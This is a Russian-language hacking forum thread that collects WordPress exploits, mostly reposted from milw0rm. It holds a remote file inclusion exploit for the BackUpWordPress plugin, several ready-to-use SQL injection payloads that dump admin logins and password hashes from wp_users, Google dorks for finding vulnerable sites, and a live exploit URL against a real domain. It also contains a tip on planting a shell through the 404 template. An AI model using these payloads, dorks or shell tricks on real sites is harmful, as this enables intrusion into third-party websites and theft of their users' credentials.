
22.10.2019, 14:35
|
|
Познающий
Регистрация: 27.11.2008
Сообщений: 86
С нами:
9186841
Репутация:
8
|
|
Сообщение от jakonda1001
↑
нашел способ заливки шелла в wordpress при наличии подключения к mysql и админки (при условие что все папки под запись закрыты или стоит .htaccess) или я изобрел велосипед?
Что за способ если не секрет?
|
|
|

23.11.2019, 01:54
|
|
Новичок
Регистрация: 30.03.2010
Сообщений: 0
С нами:
8483942
Репутация:
0
|
|
|
|
|

23.11.2019, 05:00
|
|
Постоянный
Регистрация: 26.10.2016
Сообщений: 438
С нами:
5025206
Репутация:
5
|
|
при наличии админки, шел льется в 404 ошибку, вернее в этот файл
|
|
|

01.11.2007, 19:21
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
WordPress Plugin BackUpWordPress <= 0.4.2b RFI Vulnerability
Код:
#Author: S.W.A.T.
#cont@ct: svvateam@yahoo.com
--------------------------------------------------------------------------------
------------------------- -------------------------------------------------------
Application : BackUpWordPress 0.4.2b
Download : http://wordpress.designpraxis.at/download/backupwordpress.zip
--------------------------------------------------------------------------------
Vuln :
require_once $GLOBALS['bkpwp_plugin_path']."PEAR.php";
--------------------------------------------------------------------------------
Exploit:
http://[target]/_path]/plugins/BackUp/Archive.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=Shl3?
http://[target]/_path]/plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=Shl3?
& other Files & Folders In The [Archive] Folder
--------------------------------------------------------------------------------
Dork:
"inurl:/plugins/BackUp"
Mirror:
http://www.milw0rm.com/exploits/4593
|
|
|
Sql Injection in wordpress 2.3.1 |

05.12.2007, 21:23
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
Sql Injection in wordpress 2.3.1
Sql Injection in wordpress 2.3.1
Код:
Author : Beenu Arora
Mail : beenudel1986 (at) gmail (dot) com [email concealed]
Application : WordPress (2.3.1)
Homepage: http://wordpress.org/
~~~~~~~~~~~~~~~~~~SQL Injection ~~~~~~~~~~~~
Vulnerable URL : http://localhost/path_to_wordpress/?feed=rss2&p=
Parameter : P
POC = http://localhost/path_to_wordpress/?feed=rss2&p=11/**/union/**/select/**
/concat(user_password,char(100),username),2/**/from/**/wp_users/**/where
/**/user_id=1/*
Код:
http://www.securityfocus.com/archive/1/484608
|
|
|

15.02.2008, 22:14
|
|
Участник форума
Регистрация: 16.06.2006
Сообщений: 179
С нами:
10475029
Репутация:
135
|
|
Wordpress Plugin Simple Forum 1.10-1.11 SQL Injection Vulnerability
example
Код:
http://xxxxx/forums?forum=xxxx&topic= (expliot)
EXPLOİT 1 :
Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
EXPLOİT 2 :
Код:
SİMETİMES YOU CANT SEE (xxxx&topic) SOO USE THİS EXPLOİT AFTER forum=xxx(number)
example
Код:
www.xxxxx/forums?forum=1(expliot)
&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
Wordpress Plugin Simple Forum 2.0-2.1 SQL Injection Vulnerability
example :
Код:
http://www.xxx.com/sf-forum?forum=[exploit]
EXPLOIT 1 :
Код:
-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*
exploit 2 :
Код:
-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*
(с)milw0rm.com
Последний раз редактировалось FraiDex; 15.02.2008 в 22:19..
|
|
|

17.02.2008, 03:26
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
Wordpress Photo album Remote SQL Injection Vulnerability
EXAMPLE
http://xxxxxxxx/?page_id=13&album= [exploit]
Сплоит
user_name&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201
зы
allinurl: page_id album "photo"
Auth S@BUN http://milw0rm.com/exploits/5135
|
|
|

23.04.2008, 07:22
|
|
Banned
Регистрация: 10.11.2006
Сообщений: 829
С нами:
10263663
Репутация:
1559
|
|
Wordpress Plugin Spreadsheet <= 0.6 SQL Injection Vulnerability
SQL-Injection
Код:
http://site.com/wp-content/plugins/wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain
Dork:
inurl:/wp-content/plugins/wpSS/
Author : 1ten0.0net1 
|
|
|
Сброс пароля через phpmyadmin |

27.04.2008, 08:31
|
|
Постоянный
Регистрация: 24.02.2006
Сообщений: 447
С нами:
10636106
Репутация:
705
|
|
Сброс пароля через phpmyadmin
только для версии <=2.3.x
Если вы случайно забыли пароль от админки), то можно сменить его через phpmyadmin. Подробнее.
http://cubegames.net/blog/2008/04/26/reset-wp-password-via-phpmyadmin/
запрос
UPDATE `wordpress`.`wp_users` SET `user_pass` = MD5('antichat') WHERE `wp_users`.`user_login` =`admin` LIMIT 1;
Этот метод может быть полезен если не сработало сбрасывание пасс на мыло.
http://trac.wordpress.org/ticket/6842
идет обрезание ключа почтавиками в частности gmail
версия 2.5.1 последняя на сегодняшний день.
Последний раз редактировалось Elekt; 01.05.2008 в 23:47..
|
|
|
WordPress Media Holder (id) Sql injetion vulnerability! |

30.10.2008, 18:45
|
|
Постоянный
Регистрация: 23.09.2007
Сообщений: 416
С нами:
9806786
Репутация:
869
|
|
WordPress Media Holder (id) Sql injetion vulnerability!
WordPress Media Holder (id) Sql injetion vulnerability!
Код:
-------------------------------------------------------------------
WordPress Media Holder (id) Sql injetion vulnerability!
-------------------------------------------------------------------
-------------------------------------------------------------------
Author: boom3rang
Greetz: H!tM@N - KHG - chs - redc00de!
Site : www.khg-crew.ws - [Kosova Hackers Group!]
-------------------------------------------------------------------
-------------------------------------------------------------------
Dork: mediaHolder.php?id
-------------------------------------------------------------------
Exp: http://localHost/mediaHolder.php?id=[exploit]
-------------------------------------------------------------------
exploit: -9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
liveDemo:
http://www.dhadm.com/mediaHolder.php?id=-9999/**/UNION/**/SELECT/**/concat(User(),char(58),Version()),2,3,4,5,6,Database()--
-------------------------------------------------------------------
-------------------------------------------------------------------
Proud 2 be Albanian
Proud 2 be Muslim
United States of Albania
-------------------------------------------------------------------
# milw0rm.com [2008-10-26]
Source: milw0rm
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|